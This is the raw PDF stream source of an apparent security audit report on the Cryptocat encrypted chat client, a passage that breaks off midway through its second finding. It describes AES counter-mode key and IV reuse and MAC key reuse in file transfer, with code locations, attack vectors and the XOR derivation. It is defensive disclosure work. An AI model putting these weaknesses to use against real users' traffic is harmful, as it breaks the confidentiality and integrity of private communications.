-60.88 0 Td ET Q Q q 1 0 0 1 0 21 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix B: Work Log) Tj T* ET Q Q q 1 0 0 1 397.8898 21 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (25) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix C: Exploit Code for Issue G) Tj T* ET Q Q q 1 0 0 1 397.8898 3 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (27) Tj T* -60.88 0 Td ET Q Q q Q Q q 1 0 0 1 62.69291 135.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Overview) Tj T* ET Q Q q 1 0 0 1 62.69291 93.02362 cm q BT 1 0 0 1 0 26 Tm .334983 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj 0 0 .501961 rg (Least Authority ) Tj 0 0 0 rg (security consultancy performed a security audit of the ) Tj 0 0 .501961 rg (Cryptocat ) Tj 0 0 0 rg (messaging client, on) Tj T* 0 Tw 2.271797 Tw (behalf of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s sponsor ) Tj 0 0 .501961 rg (Open Technology Fund) Tj 0 0 0 rg (. ) Tj 0 0 .501961 rg (Cryptocat ) Tj 0 0 0 rg (provides end-to-end encrypted chat) Tj T* 0 Tw (using a web browser add-on.) Tj T* ET Q Q endstream endobj % 'R180': class PDFStream 180 0 obj % page stream << /Length 5636 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This report gives the results of the audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 723.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 26 Tm 1.000751 Tw 12 TL /F1 10 Tf 0 0 0 rg (The audit investigated essential security properties such as the confidentiality and integrity protection of) Tj T* 0 Tw 1.03748 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (chat sessions and file transfers. The audit techniques included interactive penetration testing,) Tj T* 0 Tw (code and design analysis, and discussion with developers.) Tj T* ET Q Q q 1 0 0 1 62.69291 663.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (For the purposes of this audit, we assume integrity of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (add-on installed by the user.) Tj T* ET Q Q q 1 0 0 1 62.69291 609.0236 cm q BT 1 0 0 1 0 38 Tm .089984 Tw 12 TL /F1 10 Tf 0 0 0 rg (A well-known outstanding attack is the side channel of timing information emitted by the implementation of) Tj T* 0 Tw .454269 Tw (cryptographic algorithms computing on secrets. It is an unsolved problem how to prevent that information) Tj T* 0 Tw .81284 Tw (leakage with cryptographic algorithms implemented in ) Tj /F3 10 Tf (JavaScript) Tj /F1 10 Tf (. This issue is outside the scope of this) Tj T* 0 Tw (audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 579.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 38 Tm 4.06248 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our code audit covered all of the primary ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (implementation in ) Tj /F4 10 Tf (src/core/js) Tj /F1 10 Tf (, including) Tj T* 0 Tw .323059 Tw /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, and everything inside ) Tj /F4 10 Tf (etc/ ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (workers/) Tj /F1 10 Tf (. We reviewed third party code under ) Tj /F4 10 Tf (lib/) Tj T* 0 Tw 1.741098 Tw /F1 10 Tf (only when relevant to a particular investigation, which by the end of the audit included all or parts of) Tj T* 0 Tw /F4 10 Tf (bigint.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (crypto-js/) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (elliptic.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (multiParty.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (salsa20.js) Tj /F1 10 Tf (, and ) Tj /F4 10 Tf (strophe/) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .349984 Tw (In terms of feature sets, we focused primarily on cryptographic key management, the entropy system, the) Tj T* 0 Tw (newly developed file transfer feature, and relevant aspects of the user interface.) Tj T* ET Q Q q 1 0 0 1 62.69291 453.0236 cm q BT 1 0 0 1 0 26 Tm 3.588555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Some notable features which we did not deeply investigate are the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, the) Tj T* 0 Tw 6.893976 Tw (implementation of the ) Tj /F3 10 Tf (Socialist Millionaire's Protocol) Tj /F1 10 Tf (, and whether the ) Tj /F3 10 Tf (Off-The-Record ) Tj /F1 10 Tf (chat) Tj T* 0 Tw (implementation $) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf ($ is a compatible implementation of the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol.) Tj T* ET Q Q q 1 0 0 1 62.69291 363.0236 cm q BT 1 0 0 1 0 74 Tm 1.60152 Tw 12 TL /F1 10 Tf 0 0 0 rg (For the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, we spent some time comparing the specification and implementation.) Tj T* 0 Tw .53936 Tw (However, we shifted focus away from this protocol for several reasons: First, we believe this protocol will) Tj T* 0 Tw 1.942651 Tw (be replaced by one with wider support across academia and industry, such as ) Tj /F3 10 Tf (mpOTR) Tj /F1 10 Tf (. Second, the) Tj T* 0 Tw 1.735814 Tw /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (specification would benefit from including or excluding more security features,) Tj T* 0 Tw 3.959982 Tw (such as transcript soundness and consensus. Finally, the specification focuses on the "how" of) Tj T* 0 Tw 1.471318 Tw (implementation and would benefit from more specificity of the "why" of security goals. We discuss our) Tj T* 0 Tw (general recommendations for ) Tj /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (in the ) Tj 0 0 .501961 rg (Future Work ) Tj 0 0 0 rg (section.) Tj T* ET Q Q q 1 0 0 1 62.69291 345.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Appendix B: Work Log ) Tj 0 0 0 rg (describes our investigation process in fine detail.) Tj T* ET Q Q q 1 0 0 1 62.69291 318.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Target Code and Revision) Tj T* ET Q Q q 1 0 0 1 62.69291 300.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All file references are based on the ) Tj /F4 10 Tf (v2.1.15 ) Tj /F1 10 Tf (git tag of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (codebase, which has revision id:) Tj T* ET Q Q q 1 0 0 1 62.69291 266.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL (05ddc47d8c1beff4511199a011859ee046687614) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 246.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (All file references use ) Tj /F3 10 Tf (Unix) Tj /F1 10 Tf (-style paths relative to the working directory root.) Tj T* ET Q Q q 1 0 0 1 62.69291 246.8236 cm Q endstream endobj % 'R181': class PDFStream 181 0 obj % page stream << /Length 8926 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Findings) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue A. Disclosure of File Contents Due to Re-use Of Key and IV) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm .686651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer feature re-uses a symmetric encryption key and ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (CTR) Tj /F1 10 Tf (-mode for multiple) Tj T* 0 Tw (file transfers in a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session.) Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 14 Tm 2.272485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An eavesdropper can learn some or all of the contents of the transferred files under some) Tj T* 0 Tw (conditions.) Tj T* ET Q Q q 1 0 0 1 62.69291 606.0236 cm q BT 1 0 0 1 0 14 Tm 1.315318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker requires only passive collection of records of the ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (traffic $or the) Tj T* 0 Tw /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests$.) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm q BT 1 0 0 1 0 14 Tm .575366 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This attack requires only simple and efficient off-line computation once records of vulnerable) Tj T* 0 Tw (ciphertext traffic are known.) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 14 Tm .848735 Tw 12 TL /F1 10 Tf 0 0 0 rg (This loss of confidentiality occurs when more than one file is transferred through the file transfer feature) Tj T* 0 Tw (during a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session.) Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (There is ) Tj /F3 10 Tf (no ) Tj /F1 10 Tf (loss of confidentiality when only a single file is transferred.) Tj T* ET Q Q q 1 0 0 1 62.69291 498.0236 cm q BT 1 0 0 1 0 14 Tm 1.194104 Tw 12 TL /F1 10 Tf 0 0 0 rg (This traffic is present at the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol layer, which is embedded in ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf ($via ) Tj /F3 10 Tf (BOSH) Tj /F1 10 Tf ($. The ) Tj /F3 10 Tf (HTTP) Tj T* 0 Tw /F1 10 Tf (traffic of ) Tj /F3 10 Tf (crypto.cat) Tj /F1 10 Tf (, by default uses ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (to and from the server.) Tj T* ET Q Q q 1 0 0 1 62.69291 480.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A compromise is feasible through ) Tj /F3 10 Tf (at least ) Tj /F1 10 Tf (several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 474.0236 cm Q q 1 0 0 1 62.69291 474.0236 cm Q q 1 0 0 1 62.69291 450.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.204597 Tw (A server compromise $including malicious insiders$ could allow live traffic sniffing to recover these) Tj T* 0 Tw (ciphertexts.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 444.0236 cm Q q 1 0 0 1 62.69291 396.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.274269 Tw 12 TL /F1 10 Tf 0 0 0 rg (A server host compromise may grant access to log files containing recorded vulnerable traffic. $In) Tj T* 0 Tw .488735 Tw (particular we know that ) Tj /F3 10 Tf (ejabberd ) Tj /F1 10 Tf (logs complete ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (traffic when the log system is set to verbose.) Tj T* 0 Tw .716412 Tw (Being based on ) Tj /F3 10 Tf (Erlang ) Tj /F1 10 Tf (infrastructure, it is feasible to increase log verbosity without any interruption) Tj T* 0 Tw (to the service, assuming appropriate permissions on the server.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 390.0236 cm Q q 1 0 0 1 62.69291 378.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Browser logs or caches may contain recorded vulnerable ciphertexts.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 372.0236 cm Q q 1 0 0 1 62.69291 348.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed $including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service$, an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS) Tj /F1 10 Tf (-protected servers could be used to leverage this attack.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 342.0236 cm Q q 1 0 0 1 62.69291 330.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 330.0236 cm Q q 1 0 0 1 62.69291 276.0236 cm q BT 1 0 0 1 0 38 Tm 1.275984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection, and by reproducing the use of identical) Tj T* 0 Tw .471163 Tw (keys for more than one file transfer using debug output from an instrumented copy of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (. We also) Tj T* 0 Tw 3.347984 Tw (used the debug output to investigate the extent to which key rollover impacts exploitation of the) Tj T* 0 Tw (vulnerability.) Tj T* ET Q Q q 1 0 0 1 62.69291 198.0236 cm q BT 1 0 0 1 0 62 Tm .788443 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (AES ) Tj /F1 10 Tf (counter-mode encryption is used to protect the confidentiality of the file) Tj T* 0 Tw 3.151163 Tw (contents. The ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (used for encrypting file contents is a fixed constant of 0. For the receiver, see) Tj T* 0 Tw 1.896627 Tw /F4 10 Tf (./src/core/js/etc/fileTransfer.js) Tj /F1 10 Tf (, line 255, inside ) Tj /F4 10 Tf (Cryptocat.fileHandler) Tj /F1 10 Tf (. $The sender) Tj T* 0 Tw .41332 Tw (and receiver must use the same ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (for decryption to succeed. The ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is not transmitted, and instead both) Tj T* 0 Tw 1.094987 Tw (parties rely on this implicitly known value. The sender ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (code results in the same values, and we only) Tj T* 0 Tw (refer to the receiver code in this analysis.$) Tj T* ET Q Q q 1 0 0 1 62.69291 108.0236 cm q BT 1 0 0 1 0 74 Tm 2.089984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Files are transmitted in ) Tj /F3 10 Tf (chunks ) Tj /F1 10 Tf (of sequential bytes, and each chunk is encrypted separately. The ) Tj /F3 10 Tf (IV) Tj T* 0 Tw 1.216905 Tw /F1 10 Tf (parameter, which begins at 0, is incremented for each chunk, as seen in ) Tj /F3 10 Tf (./src/core/js/etc/fileTransfer.js,) Tj T* 0 Tw 1.030542 Tw (line 200) Tj /F1 10 Tf (. The actual ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (passed to the encryption library is padded using an ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (convention as seen in) Tj T* 0 Tw 1.593828 Tw /F4 10 Tf (./src/core/js/lib/otr.js) Tj /F1 10 Tf (, line 298 and related functions, so this chunk index is encoded in the) Tj T* 0 Tw 3.170514 Tw (high 8 bytes. The low 8 bytes are initialized to 0 and the low 4 bytes incremented by the ) Tj /F3 10 Tf (AES) Tj T* 0 Tw 1.578735 Tw /F1 10 Tf (implementation for each block. This means that the same block index within the same chunk index is) Tj T* 0 Tw (encrypted with the same counter value $which is correct behavior for ) Tj /F3 10 Tf (CTR ) Tj /F1 10 Tf (mode$.) Tj T* ET Q Q q 1 0 0 1 62.69291 78.02362 cm q BT 1 0 0 1 0 14 Tm 4.98152 Tw 12 TL /F1 10 Tf 0 0 0 rg (The secret key used for file transfers is derived during ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session initialization in ) Tj T* 0 Tw .734597 Tw /F4 10 Tf (src/core/js/lib/otr.js) Tj /F1 10 Tf (, line 2163. A new ) Tj /F3 10 Tf (DHSession ) Tj /F1 10 Tf (is initialized whenever there is a "round trip") Tj T* 0 Tw ET Q Q endstream endobj % 'R182': class PDFStream 182 0 obj % page stream << /Length 3498 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 717.0236 cm q BT 1 0 0 1 0 38 Tm .201294 Tw 12 TL /F1 10 Tf 0 0 0 rg (of ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (data packets \227 client A sends a data packet to client B and then B sends a data packet to A $see) Tj T* 0 Tw 2.727318 Tw /F4 10 Tf (otr.js ) Tj /F1 10 Tf (line 2338$. This sequence of events is not guaranteed to occur between file transfers, so) Tj T* 0 Tw 1.089984 Tw /F3 10 Tf (DHSession ) Tj /F1 10 Tf (rotation cannot be relied upon to prevent this loss of confidentiality. In particular, the server) Tj T* 0 Tw (could suppress messages after a file transfer that would otherwise cause a key rotation.) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 14 Tm .49152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Vulnerability Description: ) Tj /F1 10 Tf (Reuse of the same ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (with counter-mode stream encryption reveals the ) Tj /F3 10 Tf (XOR) Tj T* 0 Tw /F1 10 Tf (of the plaintext of two or more messages, given only the ciphertexts of those messages, as follows:) Tj T* ET Q Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 14 Tm 1.338876 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ciphertext generated by counter-mode is an ) Tj /F3 10 Tf (XOR ) Tj /F1 10 Tf (of a span of plaintext with the output of a block) Tj T* 0 Tw (cipher. The block cipher input is the secret key and a block ) Tj /F3 10 Tf (counter) Tj /F1 10 Tf (:) Tj T* ET Q Q q 1 0 0 1 62.69291 623.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 24 re B* Q q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F4 10 Tf 12 TL (ciphertext[j] = F$key, counter[j]$ ^ plaintext[j]) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 591.8236 cm q BT 1 0 0 1 0 14 Tm .133145 Tw 12 TL /F1 10 Tf 0 0 0 rg (Here ) Tj /F4 10 Tf (F ) Tj /F1 10 Tf (is the block cipher, and ) Tj /F4 10 Tf (j ) Tj /F1 10 Tf (is the block number. The first ) Tj /F4 10 Tf (counter[0] ) Tj /F1 10 Tf (is derived directly from the) Tj T* 0 Tw /F3 10 Tf (IV ) Tj /F1 10 Tf (and subsequent ) Tj /F4 10 Tf (counter[j+1] ) Tj /F1 10 Tf (values are derived directly from previous ) Tj /F4 10 Tf (counter[j] ) Tj /F1 10 Tf (values.) Tj T* ET Q Q q 1 0 0 1 62.69291 549.8236 cm q BT 1 0 0 1 0 26 Tm .157356 Tw 12 TL /F1 10 Tf 0 0 0 rg (If the same counter and key values are ever used on different plaintexts over the entire lifetime of the key,) Tj T* 0 Tw 2.327045 Tw (then the ) Tj /F3 10 Tf (XOR ) Tj /F1 10 Tf (of the associated plaintexts can be recovered. Suppose ) Tj /F4 10 Tf (A ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (B ) Tj /F1 10 Tf (are two blocks of) Tj T* 0 Tw (plaintext, and ) Tj /F4 10 Tf (A' ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (B' ) Tj /F1 10 Tf (are the associated ciphertexts, then:) Tj T* ET Q Q q 1 0 0 1 62.69291 468.6236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 72 re B* Q q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F4 10 Tf 12 TL (A' ^ B') Tj T* (= $ F\(key, C$ ^ A \) ^ $ F\(key, C$ ^ B \)) Tj T* (= $ F\(key, C$ ^ F$key, C$ \) ^ $ A ^ B $) Tj T* (= 0 ^ $ A ^ B $) Tj T* (= A ^ B) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 448.6236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This reduces the security to that of a ") Tj 0 0 .501961 rg (running-key cipher) Tj 0 0 0 rg (", which is easily broken.) Tj T* ET Q Q q 1 0 0 1 62.69291 448.6236 cm Q endstream endobj % 'R183': class PDFStream 183 0 obj % page stream << /Length 6573 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue B. Integrity Key and IV Reuse in File Transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2013-11-06) Tj T* ET Q Q q 1 0 0 1 62.69291 699.0236 cm q BT 1 0 0 1 0 14 Tm 2.092651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Re-use of the ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key potentially allows files to be modified during file transfer, without) Tj T* 0 Tw (detection by the receiving client.) Tj T* ET Q Q q 1 0 0 1 62.69291 645.0236 cm q BT 1 0 0 1 0 38 Tm 1.722339 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (When keys are reused due to the vulnerability described in Issue A, it is possible to "splice") Tj T* 0 Tw 1.763555 Tw (ciphertext chunks between transfers of files with the same number of chunks, without invalidating the) Tj T* 0 Tw .754431 Tw /F3 10 Tf (MAC ) Tj /F1 10 Tf (tag. This gives an active attacker a limited ability to manipulate the contents of files in flight, under) Tj T* 0 Tw (certain conditions.) Tj T* ET Q Q q 1 0 0 1 62.69291 615.0236 cm q BT 1 0 0 1 0 14 Tm 1.129984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (This is an active attack requiring modification of ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests $or the ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol traffic embedded in those ) Tj /F3 10 Tf (HTTP ) Tj /F1 10 Tf (requests$.) Tj T* ET Q Q q 1 0 0 1 62.69291 585.0236 cm q BT 1 0 0 1 0 14 Tm 1.127485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This loss of integrity occurs when more than one file is transferred through the file transfer) Tj T* 0 Tw (feature during a single ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (session, and the files have the same number of 64511-byte chunks.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A compromise is feasible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.759213 Tw (A server compromise $including malicious insiders$ could allow modification or live update of the) Tj T* 0 Tw (server code.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 531.0236 cm Q q 1 0 0 1 62.69291 507.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed $including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service$, an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS ) Tj /F1 10 Tf (protected servers could be used to leverage this attack.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 489.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 489.0236 cm Q q 1 0 0 1 62.69291 447.0236 cm q BT 1 0 0 1 0 26 Tm 1.249983 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by source code inspection. The experiments performed for Issue A) Tj T* 0 Tw 1.645318 Tw (also support the conclusion that ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (keys are reused between file transfers, provided that there has) Tj T* 0 Tw (been no key rollover.) Tj T* ET Q Q q 1 0 0 1 62.69291 417.0236 cm q BT 1 0 0 1 0 14 Tm .461984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (HMAC ) Tj /F1 10 Tf (with ) Tj /F3 10 Tf (SHA-256 ) Tj /F1 10 Tf (is used to protect the integrity of the file contents. Each) Tj T* 0 Tw (chunk of the file is transmitted with a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (computed on the following fields:) Tj T* ET Q Q q 1 0 0 1 62.69291 359.8236 